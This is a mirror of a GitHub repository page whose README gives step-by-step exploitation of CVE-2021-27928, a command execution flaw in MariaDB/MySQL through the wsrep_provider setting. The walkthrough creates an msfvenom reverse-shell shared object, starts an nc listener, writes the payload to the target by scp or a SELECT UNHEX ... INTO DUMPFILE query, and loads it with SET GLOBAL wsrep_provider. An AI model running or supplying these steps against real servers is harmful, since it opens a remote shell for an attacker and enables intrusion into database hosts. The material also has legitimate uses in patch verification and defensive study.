https://github.com/al1ex/cve-2021-27928
CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞
https://github.com/al1ex/cve-2021-27928
cve cve-2021-27928 mariadb
Last synced: about 1 month ago
JSON representation
CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞
- Host: GitHub
- URL: https://github.com/al1ex/cve-2021-27928
- Owner: Al1ex
- Created: 2021-04-15T06:40:49.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-29T15:57:12.000Z (almost 2 years ago)
- Last Synced: 2025-03-25T05:07:31.968Z (about 2 months ago)
- Topics: cve, cve-2021-27928, mariadb
- Homepage:
- Size: 1.35 MB
- Stars: 62
- Watchers: 1
- Forks: 16
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Information
~~~
Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
Date: 03/18/2021
Exploit Author: Central InfoSec
Version:
MariaDB 10.2 before 10.2.37
10.3 before 10.3.28
10.4 before 10.4.18
10.5 before 10.5.9
Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
Tested on: Linux
CVE : CVE-2021-27928
~~~
## How to Exploit
Step 1: Create the reverse shell payload
```
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so
```
Step 2: Start a listener
```
nc -lnvp
```
Step 3: Copy the payload to the target machine
**Via SCP**
```
scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so
```
**Via Dumpfile**
```
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u -p -h
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';
```
Step 4:Execute the payload
```
mysql -u -p -h
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
```
## Reference
https://www.exploit-db.com/exploits/49765
https://jira.mariadb.org/browse/MDEV-25179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928